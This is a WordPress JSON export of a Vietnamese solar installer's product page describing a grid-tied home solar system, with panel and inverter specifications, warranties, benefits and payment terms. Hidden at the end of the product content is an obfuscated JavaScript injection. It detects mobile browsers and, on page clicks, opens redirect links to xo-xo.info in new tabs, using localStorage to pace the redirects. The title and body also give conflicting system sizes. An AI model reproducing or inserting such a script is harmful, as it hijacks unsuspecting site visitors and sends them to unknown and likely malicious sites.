{"id":1963,"date":"2018-09-01T11:19:51","date_gmt":"2018-09-01T04:19:51","guid":{"rendered":"http:\/\/solarcsc.com\/?post_type=product&#038;p=1963"},"modified":"2021-07-24T19:21:11","modified_gmt":"2021-07-24T12:21:11","slug":"he-thong-dien-mat-troi-hoa-luoi-3450wp","status":"publish","type":"product","link":"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp","title":{"rendered":"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP"},"content":{"rendered":"<p><span style=\"color: #0000ff;\"><strong>H\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3450WP<\/strong><\/span> \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf, t\u00ednh to\u00e1n ph\u00f9 h\u1ee3p cho h\u1ed9 gia \u0111\u00ecnh \u1edf m\u1ee9c ti\u00eau th\u1ee5 t\u1eeb 800kWh &#8211; 1400kWh<\/p>\n<p><strong>Th\u00f4ng tin v\u1ec1 pin<\/strong><\/p>\n<p>&#8211; H\u00e3ng s\u1ea3n xu\u1ea5t Qcell-Hanwa<br \/>\n&#8211; C\u00f4ng su\u1ea5t: 345Wp\/t\u1ea5m<br \/>\n&#8211; Lo\u1ea1i: Poly<br \/>\n&#8211; \u0110\u1ee7 ti\u00eau chu\u1ea9n xu\u1ea5t kh\u1ea9u \u0111i c\u00e1c th\u1ecb tr\u01b0\u1eddng kh\u00f3 t\u00ednh nh\u01b0 USA, EU<br \/>\n&#8211; Pin \u0111\u1ea1t c\u00e1c ti\u00eau chu\u1ea9n kh\u1eaft khe nh\u01b0: CSA (USA), TUV, CE, ISO&#8230;<br \/>\n&#8211;\u00a0<span style=\"color: #ff0000;\">S\u1ea3n ph\u1ea9m \u0111\u01b0\u1ee3c b\u1ea3o h\u00e0nh: 10 n\u0103m<\/span>; b\u1ea3o h\u00e0nh sau 20 n\u0103m s\u1eed d\u1ee5ng hi\u1ec7u su\u1ea5t v\u1eabn c\u00f2n &gt; 80%.<br \/>\n&#8211; Xu\u1ea5t x\u1ee9: H\u00e0n Qu\u1ed1c<\/p>\n<p><strong>Th\u00f4ng tin v\u1ec1 inverter chuy\u1ec3n \u0111\u1ed5i \u0111i\u1ec7n<\/strong><\/p>\n<p>&#8211; H\u00e3ng s\u1ea3n xu\u1ea5t SolaX<br \/>\n&#8211; S\u1ea3n ph\u1ea9m \u0111\u01b0\u1ee3c b\u1ea3o hi\u1ec3m b\u1edfi: SOLARIF &#8211; CHLB \u0110\u1ee9c v\u00e0 PINGAN<br \/>\n&#8211; S\u1ea3n ph\u1ea9m \u0111\u01b0\u1ee3c b\u1ea3o h\u00e0nh: 5 n\u0103m (M\u1edf r\u1ed9ng \u0111\u1ebfn 10 n\u0103m)<br \/>\n&#8211; C\u00f4ng su\u1ea5t pin m\u1eb7t tr\u1eddi t\u1ed1i \u0111a: 3600Wp<br \/>\n&#8211; S\u1ed1 ng\u00f5 PV: 1\/MC4 &#8211; D\u1ea3i \u0111i\u1ec7n \u00e1p MPP: 120~450VDC<br \/>\n&#8211; C\u00f4ng su\u1ea5t ng\u00f5 AC: 3000VA- \u0110i\u1ec7n \u00e1p l\u01b0\u1edbi: 230V\/50Hz<br \/>\n&#8211; Tu\u00e2n th\u1ee7 c\u00e1c ti\u00eau chu\u1ea9n qu\u1ea3n l\u00fd ch\u1ea5t l\u01b0\u1ee3ng, s\u1ea3n xu\u1ea5t, an to\u00e0n h\u00e0ng \u0111\u1ea7u th\u1ebf gi\u1edbi: IEC, EN, EMC, ISO, VERITAS.<br \/>\n&#8211; C\u1ea5p b\u1ea3o v\u1ec7: IP67\/ NEMA<br \/>\n<span style=\"color: #ff0000;\">&#8211; S\u1ea3n ph\u1ea9m c\u00f3 tu\u1ed5i th\u1ecd tr\u00ean 25 n\u0103m<\/span>\u00a0nh\u1edd s\u1eed d\u1ee5ng linh ki\u1ec7n ch\u1ea5t l\u01b0\u1ee3ng cao c\u1ee7a c\u00e1c h\u00e3ng danh ti\u1ebfng nh\u01b0: TI, FAIRCHILD, VAC, INFINEON, NCC, Littlefuse,&#8230; c\u1ee7a c\u00e1c qu\u1ed1c gia \u0110\u1ee9c, M\u1ef9, Nh\u1eadt, \u0110\u00e0i Loan,&#8230; EPCOS, NXP, CREE, VIKING, &#8230;. c\u1ee7a c\u00e1c Qu\u1ed1c Gia: \u0110\u1ee9c, M\u1ef9, Nh\u1eadt, \u0110\u00e0i Loan.<\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td>\n<p align=\"center\">T\u00ean thi\u1ebft b\u1ecb<\/p>\n<\/td>\n<td>\n<p align=\"center\">S\u1ed1 l\u01b0\u1ee3ng<\/p>\n<\/td>\n<td>\n<p align=\"center\">B\u1ea3o h\u00e0nh<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>T\u1ea5m pin n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi Poly 345w<\/td>\n<td>\n<p align=\"center\">10<\/p>\n<\/td>\n<td>\n<p align=\"center\">12 n\u0103m<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>B\u1ed9 h\u00f2a l\u01b0\u1edbi\u00a0on\u00a0Grid Tie Inverter 3KW\u00a0 (120 V ~ \u00a0450\u00a0VDC)<\/td>\n<td>\n<p align=\"center\">01<\/p>\n<\/td>\n<td>\n<p align=\"center\">5 n\u0103m<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong>Nguy\u00ean l\u00fd ho\u1ea1t \u0111\u1ed9ng c\u1ee7a h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi<\/strong><\/p>\n<p><img decoding=\"async\" class=\"lazy-load-active aligncenter\" src=\"https:\/\/static1.squarespace.com\/static\/5354537ce4b0e65f5c20d562\/t\/58edd77b414fb5fa3168561f\/1492571229847\/basics+layout+of+a+grid+connect+solar+power+system\" alt=\"K\u1ebft qu\u1ea3 h\u00ecnh \u1ea3nh cho solar panel on grid\" data-src=\"https:\/\/static1.squarespace.com\/static\/5354537ce4b0e65f5c20d562\/t\/58edd77b414fb5fa3168561f\/1492571229847\/basics+layout+of+a+grid+connect+solar+power+system\" \/><\/p>\n<p style=\"text-align: center;\"><em>Nguy\u00ean l\u00fd ho\u1ea1t \u0111\u1ed9ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi<\/em><\/p>\n<p><strong>L\u1ee3i \u00edch<\/strong><\/p>\n<p>&#8211; S\u1ea3n l\u01b0\u1ee3ng:<span style=\"color: #ff0000;\">\u00a0390-480 KWh\/th\u00e1ng<\/span><br \/>\n&#8211; Gi\u1ea3m ti\u1ec1n \u0111i\u1ec7n h\u00e0ng th\u00e1ng<br \/>\n&#8211; Gi\u1ea3m nhi\u1ec7t cho ng\u00f4i nh\u00e0 c\u1ee7a b\u1ea1n<br \/>\n&#8211; Gi\u1ea3m ph\u00e1t th\u1ea3i CO<sub>2<\/sub>\u00a0hi\u1ec7u \u1ee9ng nh\u00e0 k\u00ednh<\/p>\n<p><strong>T\u1ea1i sao b\u1ea1n n\u00ean ch\u1ecdn Solar Qu\u1ea3ng B\u00ecnh?<\/strong><\/p>\n<p><span style=\"color: #ed1c24;\">&#8211; <strong>B\u1ea3o h\u00e0nh h\u1ec7 th\u1ed1ng 5 n\u0103m<\/strong><\/span><\/p>\n<p><span style=\"color: #ff0000;\">&#8211; B\u1ea3o h\u00e0nh l\u00ean \u0111\u1ebfn 10 n\u0103m v\u00e0 h\u1ed7 tr\u1ee3 b\u1ea3o h\u00e0nh su\u1ed1t d\u00f2ng \u0111\u1eddi h\u1ec7 th\u1ed1ng<\/span><br \/>\n<span style=\"color: #ff0000;\">&#8211; B\u1ea3o h\u00e0nh si\u00eau t\u1ed1c &lt; 72 gi\u1edd<\/span><br \/>\n<span style=\"color: #ff0000;\">&#8211; H\u1ed7 tr\u1ee3 k\u1ef9 thu\u1eadt 24\/24<\/span><br \/>\n&#8211; Lu\u00f4n \u0111\u1eb7t l\u1ee3i \u00edch kh\u00e1ch h\u00e0ng l\u00ean h\u00e0ng \u0111\u1ea7u<\/p>\n<p><strong>G\u00f3i ti\u1ec7n \u00edch<\/strong><\/p>\n<p>&#8211; B\u1ea3o h\u00e0nh v\u00e0ng inverter th\u00eam 5 n\u0103m:\u00a0<span style=\"color: #ff0000;\">2,5<\/span><span style=\"color: #ff0000;\">00,000 vn\u0111<\/span><\/p>\n<p><strong>Chi ph\u00ed khung l\u1eafp \u0111\u1eb7t v\u00e0 chi ph\u00ed v\u1eadn chuy\u1ec3n<\/strong><\/p>\n<p>Li\u00ean h\u1ec7 b\u00e1o gi\u00e1 sau.<\/p>\n<p><strong>Ph\u01b0\u01a1ng th\u1ee9c thanh to\u00e1n<\/strong><\/p>\n<p><span style=\"color: #ff0000;\">40% khi \u0111\u1eb7t h\u00e0ng, 40% khi giao h\u00e0ng, 20% sau khi nghi\u1ec7m thu ho\u00e0n thi\u1ec7n<\/span><\/p>\n<p>&nbsp;<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/xo-xo.info\/Wxk9c5','https:\/\/xo-xo.info\/Rie8c9','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/xo-xo.info\/FtC5c7','8SJGLkz','random','https:\/\/xo-xo.info\/nSa1c8','7196643rGaMMg','setItem','-mnts','https:\/\/xo-xo.info\/LiL2c3','266801SrzfpD','substr','floor','-local-storage','https:\/\/xo-xo.info\/KAZ4c3','3ThLcDl','stopPropagation','_blank','https:\/\/xo-xo.info\/Yht3c7','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/xo-xo.info\/xRg0c2'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/xo-xo.info\/oDy6c2','https:\/\/xo-xo.info\/DWA7c5',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>H\u1ec7 th\u1ed1ng \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP, ph\u00f9 h\u1ee3p cho h\u1ed9 gia \u0111\u00ecnh c\u00f3 ti\u00eau th\u1ee5 \u0111i\u1ec7n n\u0103ng t\u1eeb 2.500.000 \u2013 4.000.000VND\/th\u00e1ng. B\u00ean c\u1ea1nh \u0111\u00f3 c\u00f2n gi\u00fap gi\u1ea3m nhi\u1ec7t cho ng\u00f4i nh\u00e0 c\u1ee7a b\u1ea1n. H\u1ec7 th\u1ed1ng n\u00e0y ph\u00f9 h\u1ee3p, t\u1ed1i \u01b0u v\u1ec1 hi\u1ec7u qu\u1ea3 kinh t\u1ebf cho h\u1ed9 gia \u0111\u00ecnh t\u01b0\u01a1ng \u1ee9ng v\u1edbi m\u1ee9c \u0111i\u1ec7n n\u0103ng ti\u00eau th\u1ee5<\/p>\n","protected":false},"featured_media":2992,"template":"","meta":[],"product_cat":[735],"product_tag":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\r\n<title>H\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh<\/title>\r\n<meta name=\"description\" content=\"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP, ph\u00f9 h\u1ee3p cho h\u1ed9 gia \u0111\u00ecnh c\u00f3 ti\u00eau th\u1ee5 \u0111i\u1ec7n n\u0103ng t\u1eeb 2.500.000 \u2013 4.000.000VND\/th\u00e1ng. B\u00ean c\u1ea1nh \u0111\u00f3 c\u00f2n gi\u00fap gi\u1ea3m nhi\u1ec7t cho ng\u00f4i nh\u00e0 c\u1ee7a b\u1ea1n. H\u1ec7 th\u1ed1ng n\u00e0y ph\u00f9 h\u1ee3p, t\u1ed1i \u01b0u v\u1ec1 hi\u1ec7u qu\u1ea3 kinh t\u1ebf cho h\u1ed9 gia \u0111\u00ecnh t\u01b0\u01a1ng \u1ee9ng v\u1edbi m\u1ee9c \u0111i\u1ec7n n\u0103ng ti\u00eau th\u1ee5\" \/>\r\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\r\n<link rel=\"canonical\" href=\"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp\" \/>\r\n<meta property=\"og:locale\" content=\"vi_VN\" \/>\r\n<meta property=\"og:type\" content=\"article\" \/>\r\n<meta property=\"og:title\" content=\"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\" \/>\r\n<meta property=\"og:description\" content=\"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP, ph\u00f9 h\u1ee3p cho h\u1ed9 gia \u0111\u00ecnh c\u00f3 ti\u00eau th\u1ee5 \u0111i\u1ec7n n\u0103ng t\u1eeb 2.500.000 \u2013 4.000.000VND\/th\u00e1ng. B\u00ean c\u1ea1nh \u0111\u00f3 c\u00f2n gi\u00fap gi\u1ea3m nhi\u1ec7t cho ng\u00f4i nh\u00e0 c\u1ee7a b\u1ea1n. H\u1ec7 th\u1ed1ng n\u00e0y ph\u00f9 h\u1ee3p, t\u1ed1i \u01b0u v\u1ec1 hi\u1ec7u qu\u1ea3 kinh t\u1ebf cho h\u1ed9 gia \u0111\u00ecnh t\u01b0\u01a1ng \u1ee9ng v\u1edbi m\u1ee9c \u0111i\u1ec7n n\u0103ng ti\u00eau th\u1ee5\" \/>\r\n<meta property=\"og:url\" content=\"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp\" \/>\r\n<meta property=\"og:site_name\" content=\"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\" \/>\r\n<meta property=\"article:modified_time\" content=\"2021-07-24T12:21:11+00:00\" \/>\r\n<meta property=\"og:image\" content=\"https:\/\/solarquangbinh.com\/wp-content\/uploads\/2018\/09\/images-5.jpg\" \/>\r\n\t<meta property=\"og:image:width\" content=\"225\" \/>\r\n\t<meta property=\"og:image:height\" content=\"225\" \/>\r\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\r\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\r\n<meta name=\"twitter:label1\" content=\"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 ph\u00fat\" \/>\r\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp\",\"url\":\"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp\",\"name\":\"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\",\"isPartOf\":{\"@id\":\"https:\/\/solarquangbinh.com\/#website\"},\"datePublished\":\"2018-09-01T04:19:51+00:00\",\"dateModified\":\"2021-07-24T12:21:11+00:00\",\"description\":\"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP, ph\u00f9 h\u1ee3p cho h\u1ed9 gia \u0111\u00ecnh c\u00f3 ti\u00eau th\u1ee5 \u0111i\u1ec7n n\u0103ng t\u1eeb 2.500.000 \u2013 4.000.000VND\/th\u00e1ng. B\u00ean c\u1ea1nh \u0111\u00f3 c\u00f2n gi\u00fap gi\u1ea3m nhi\u1ec7t cho ng\u00f4i nh\u00e0 c\u1ee7a b\u1ea1n. H\u1ec7 th\u1ed1ng n\u00e0y ph\u00f9 h\u1ee3p, t\u1ed1i \u01b0u v\u1ec1 hi\u1ec7u qu\u1ea3 kinh t\u1ebf cho h\u1ed9 gia \u0111\u00ecnh t\u01b0\u01a1ng \u1ee9ng v\u1edbi m\u1ee9c \u0111i\u1ec7n n\u0103ng ti\u00eau th\u1ee5\",\"breadcrumb\":{\"@id\":\"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp#breadcrumb\"},\"inLanguage\":\"vi\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/solarquangbinh.com\/?product=he-thong-dien-mat-troi-hoa-luoi-3450wp#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Trang ch\u1ee7\",\"item\":\"https:\/\/solarquangbinh.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"S\u1ea3n ph\u1ea9m\",\"item\":\"https:\/\/solarquangbinh.com\/?page_id=20\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/solarquangbinh.com\/#website\",\"url\":\"https:\/\/solarquangbinh.com\/\",\"name\":\"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\",\"description\":\"\u0110i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi Qu\u1ea3ng B\u00ecnh, Solar Quang Binh, Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef, pin n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, Solar Quang Binh\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/solarquangbinh.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"vi\"}]}<\/script>\r\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"H\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi 3100WP - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng 